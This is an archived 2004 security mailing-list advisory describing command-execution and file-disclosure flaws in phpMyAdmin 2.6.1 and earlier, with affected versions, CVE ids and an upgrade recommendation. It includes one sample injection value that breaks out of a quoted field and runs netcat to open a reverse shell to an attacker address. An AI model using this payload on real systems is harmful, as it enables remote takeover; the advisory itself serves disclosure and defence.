Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]

[UNIX] Multiple Vulnerabilities in phpMyAdmin (External Transformations)

Subject: [UNIX] Multiple Vulnerabilities in phpMyAdmin (External Transformations)
Date: 22 Dec 2004 14:06:14 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Multiple Vulnerabilities in phpMyAdmin (External Transformations)
------------------------------------------------------------------------


SUMMARY

 <http://www.phpmyadmin.net/home_page/> phpMyAdmin is "a tool written in 
PHP intended to handle the administration of MySQL over the Web. Currently 
it can create and drop databases, create/drop/alter tables, 
delete/edit/add fields, execute any SQL statement, manage keys on fields, 
manage privileges, export data into various formats and is available in 47 
languages".

Two vulnerabilities in phpMyAdmin have been discovered, these 
vulnerabilities allow command execution and disclosure of sensitive files.

DETAILS

Vulnerable Systems:
 * phpMyAdmin version 2.6.1 and prior

Immune Systems:
 * phpMyAdmin version 2.6.1-rc1

Technical details:
Command execution:
 * Bug introduced in 2.6.0-pl2
 * Attacker does *not* need access to the phpMyAdmin interface
 * PHP safe mode must be off
 * External transformations must be activated
 * Sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure:
 * Attacker need access to the phpMyAdmin interface
 * PHP safe mode must be off
 * $cfg['UploadDir'] must be defined
 * Exploitation is done via 'sql_localfile'

Vendor Response:
After notification by Exaprobe, maintainers of the phpMyAdmin project have 
released version 2.6.1-rc1 that fixes these two vulnerabilities.

Recommendation:
Upgrade to 2.6.1-rc1 or newer. Deactivate uploads and transformations if 
possible.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1147> 
CAN-2004-1147
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1148> 
CAN-2004-1148


ADDITIONAL INFORMATION

The information has been provided by  <mailto:ngregoire@exaprobe.com> 
Nicolas Gregoire.
The original article can be found at:  
<http://www.exaprobe.com/labs/advisories/esa-2004-1213.html> 
http://www.exaprobe.com/labs/advisories/esa-2004-1213.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Multiple Vulnerabilities in phpMyAdmin (External Transformations), SecuriTeam <=